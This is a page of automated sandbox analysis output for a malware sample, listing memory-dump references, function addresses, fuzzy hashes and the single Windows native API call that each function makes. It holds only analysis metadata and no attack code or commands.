Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: FileInformationVolume
String ID:
API String ID: 2893123674-0
Opcode ID: d288ba80d240c1dd28e81b079edeeb52074e91e1b66296d64a0eee0d0dcb6881
Instruction ID: 7b5e6ee473d866efa25fd80cf1597bc44ec6a8ab18e38395cce30c9ed3f2e705
Opcode Fuzzy Hash: d288ba80d240c1dd28e81b079edeeb52074e91e1b66296d64a0eee0d0dcb6881
Instruction Fuzzy Hash: ABE0ECA2505158BAD624A7EBAC0CDF77F6CDBC67B1B448419B58992150C660AC41C6F0

Function 00A19278 Relevance: 1.5, APIs: 1, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

NtQueryKey.NTDLL(?,?,?,?,?), ref: 00A1929F

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Query
String ID:
API String ID: 3850148591-0
Opcode ID: c611e281d5707c09a3e99eb466a517df8a6d6f8df0377b807d09f78188a899ca
Instruction ID: dfc70b61fe552b252e49a49dbae87f374b1a54fbd638f3c0a626054e66de45be
Opcode Fuzzy Hash: c611e281d5707c09a3e99eb466a517df8a6d6f8df0377b807d09f78188a899ca
Instruction Fuzzy Hash: 9CE0ECA2110264BEA61097DAAC0DEF77F6CDBD67B2F048119B54992110D270AC45C2B0

Function 00A195FC Relevance: 1.5, APIs: 1, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

NtQueryObject.NTDLL(?,?,?,?,?), ref: 00A19623

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: ObjectQuery
String ID:
API String ID: 2748340528-0
Opcode ID: aa9af29e648730ae4f87084d51c1ec52442c71dd146f633310f5161db866e4f0
Instruction ID: ec4832e9f06ea9bc85d34bd4b9a0b6cd6591ee1bd3ff5a157c7cf4fed6740e6d
Opcode Fuzzy Hash: aa9af29e648730ae4f87084d51c1ec52442c71dd146f633310f5161db866e4f0
Instruction Fuzzy Hash: D6E0ECB1504158BA971097DA9C0DDF77F6CDBC67B0F044129B518E21109660AC41C6F0

Function 00A19760 Relevance: 1.5, APIs: 1, Instructions: 26filenativeCOMMON

Download Yara Rule

APIs

NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 00A19787

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: FileInformationQueryVolume
String ID:
API String ID: 634242254-0
Opcode ID: 2e646d8fc8e7dee0d07c1f3847aa43d13f84282383526f65730bcc954c2e6da2
Instruction ID: e339a9451c543175db9c676b61e78ae66c7e2bf1e53ae44c4ff885301cb329ee
Opcode Fuzzy Hash: 2e646d8fc8e7dee0d07c1f3847aa43d13f84282383526f65730bcc954c2e6da2
Instruction Fuzzy Hash: 91E082A6400228BEE7609BCAAC0CEF77F2CDBC2BB0B048219B408A6100C270AD40C2B0

Function 00A19810 Relevance: 1.5, APIs: 1, Instructions: 26filenativeCOMMON

Download Yara Rule

APIs

NtUnlockFile.NTDLL(?,?,?,?,?), ref: 00A19837

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: FileUnlock
String ID:
API String ID: 45017762-0
Opcode ID: 972010868d1ab2776e710279483ecd20bc9af146c2b9a3f9fa27996e49301f05
Instruction ID: eb6070e37e7ce15d7e756140384861ac8e274352d831fc375a624f3ee87026e8
Opcode Fuzzy Hash: 972010868d1ab2776e710279483ecd20bc9af146c2b9a3f9fa27996e49301f05
Instruction Fuzzy Hash: A8E0ECA5100254BE965097DB9C0CDF7BF6CDBD67B1F048129B508D7110C260AD49C2B0

Function 00A1987C Relevance: 1.5, APIs: 1, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

NtQuerySection.NTDLL(?,?,?,?,?), ref: 00A198A3

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: QuerySection
String ID:
API String ID: 1985485932-0
Opcode ID: 2d4583f8054a60a3a26b44a90018c1bf6214e67f6027175fa5445ca4f64d6137
Instruction ID: 5b6985782799005663c47fe4a9b325fcdd86f77c36375605b74f0c8dd91116ef
Opcode Fuzzy Hash: 2d4583f8054a60a3a26b44a90018c1bf6214e67f6027175fa5445ca4f64d6137
Instruction Fuzzy Hash: 8AE0ECB5508258BEA71097DA9C0CDF77F6DDBD77B0B544029B509E21508261AC41C2B0

Function 00A199A8 Relevance: 1.5, APIs: 1, Instructions: 26filenativeCOMMON

Download Yara Rule

APIs

NtQueryInformationFile.NTDLL(?,?,?,?,?), ref: 00A199CF

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: FileInformationQuery
String ID:
API String ID: 365787318-0
Opcode ID: 16ce7f900cc081176651bc20b2e2600567dd0385e1a85dbda2eaba09309ac255
Instruction ID: ff58fb1f31c6f6080c3604140d4830874e1a68412783436fc452f64be7b39584
Opcode Fuzzy Hash: 16ce7f900cc081176651bc20b2e2600567dd0385e1a85dbda2eaba09309ac255
Instruction Fuzzy Hash: D7E0ECA1501154BA971097DA9C0CEF77F6CDBD67B1B44811DB609921109661AD41C6B4

Function 00A19024 Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtOpenKeyEx.NTDLL(?,?,?,?), ref: 00A19045

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 9d04ad9c09b1f9145f03a4ee5bc61bde53c203aa6d8095b7ff69aa8261ac0be4
Instruction ID: 6f693866085143b8ddf31d08fc7fad11bdc28c50ba04fa9f6f43bcadc521580b
Opcode Fuzzy Hash: 9d04ad9c09b1f9145f03a4ee5bc61bde53c203aa6d8095b7ff69aa8261ac0be4
Instruction Fuzzy Hash: 91D0A7F1004128BEE71093D99C0DEF77E9CDB993E1F048019B105D3000C2A5AC80C3F0

Function 00A19540 Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtSetInformationKey.NTDLL(?,?,?,?), ref: 00A19561

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Information
String ID:
API String ID: 2951059284-0
Opcode ID: 91e4eb31a89c1b75bcc405210a46122ae8368026c4c2d686131c646dbbec5866
Instruction ID: dfcd6ffd7c2b6f1af0a9fe509b54bcc8f304e050842e8933d8fb3207ecfded81
Opcode Fuzzy Hash: 91e4eb31a89c1b75bcc405210a46122ae8368026c4c2d686131c646dbbec5866
Instruction Fuzzy Hash: CDD05EE1001114BFE25193D9AC0DEF73E5DCB863B0F484015B108E2000E2646D80C2B0

